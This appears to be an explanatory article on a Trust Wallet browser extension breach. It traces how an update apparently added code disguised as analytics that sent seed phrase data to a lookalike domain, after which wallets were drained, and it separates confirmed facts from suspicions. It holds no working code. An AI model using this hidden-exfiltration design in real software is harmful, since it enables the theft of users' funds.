TrustWallet Hack Explained: From Update to Wallet Drains worth $16M in $TWT, BTC, ETH

What Exactly Happened in the Trust Wallet Incident

Step 1: A New Browser Extension Update Was Released

A new update for the Trust Wallet browser extension was released on December 24.

• The update seemed routine.

• No major security warnings came with it.

• Users installed it through the usual update process.

At this point, nothing seemed suspicious.

Step 2: New Code Was Added to the Extension

After the update, researchers looking into the extension’s files noticed changes in a JavaScript file known as 4482.js.

Key observation:

• The new code was not in earlier versions.

• It introduced network requests linked to user actions.

This matters because browser wallets are very sensitive environments; any new outgoing logic poses a high risk.

Step 3: Code Masqueraded as “Analytics”

The added logic appeared as analytics or telemetry code.

Specifically:

• It looked like tracking logic used by common analytics SDKs.

• It did not trigger all the time.

• It activated only under certain conditions.

This design made it harder to detect during casual testing.

Step 4: Trigger Condition — Importing a Seed Phrase

Community reverse-engineering suggests the logic was triggered when a user imported a seed phrase into the extension.

Why this is critical:

• Importing a seed phrase gives the wallet full control.

• This is a one-time, high-value moment.

• Any malicious code only needs to act once.

Users who only used existing wallets may not have triggered this path.

Step 5: Wallet Data Was Sent Externally

When the trigger condition occurred, the code allegedly sent data to an external endpoint:

metrics-trustwallet[.]com

What raised alarms:

• The domain looked a lot like a legitimate Trust Wallet subdomain.

• It was registered only days earlier.

• It was not publicly documented.

• It later went offline.

At least, this confirms unexpected outgoing communication from the wallet extension.

Step 6: Attackers Acted Immediately

Shortly after seed phrase imports, users reported:

• Wallets drained within minutes.

• Multiple assets moved quickly.

• No further user interaction was needed.

On-chain behavior showed:

• Automated transaction patterns.

• Multiple destination addresses.

• No obvious phishing approval flow.

This suggests attackers already had enough access to sign transactions.

Step 7: Funds Were Consolidated Across Addresses

Stolen assets were routed through several attacker-controlled wallets.

Why this matters:

• It suggests coordination or scripting.

• It reduces reliance on a single address.

• It matches behavior seen in organized exploits.

Estimates based on tracked addresses suggest millions of dollars moved, although totals vary.

Step 8: The Domain Went Dark

After attention increased:

• The suspicious domain stopped responding.

• No public explanation followed immediately.

• Screenshots and cached evidence became crucial.

This is consistent with attackers destroying infrastructure once exposed.

Step 9: Official Acknowledgment Came Later

Trust Wallet later confirmed:

• A security incident affected a specific version of the browser extension.

• Mobile users were not affected.

• Users should upgrade or disable the extension.

However, no full technical breakdown was given right away to explain:

• Why the domain existed.

• Whether seed phrases were exposed.

• Whether this was an internal, third-party, or external issue.

This gap fueled ongoing speculation.

What Is Confirmed

• A browser extension update introduced new outgoing behavior.

• Users lost funds shortly after importing seed phrases.

• The incident was limited to a specific version.

• Trust Wallet acknowledged a security issue.

What Is Strongly Suspected

• A supply-chain issue or malicious code injection.

• Seed phrases or signing ability being exposed.

• The analytics logic being misused or weaponized.

What Is Still Unknown

• Whether the code was intentionally malicious or compromised upstream.

• How many users were affected.

• Whether any other data was taken.

• Exact attribution of the attackers.

Why This Incident Matters

This was not typical phishing.

It highlights:

• The danger of browser extensions.

• The risk of blindly trusting updates.

• How analytics code can be misused.

• Why handling seed phrases is the most critical moment in wallet security.

Even a short-lived vulnerability can have serious consequences.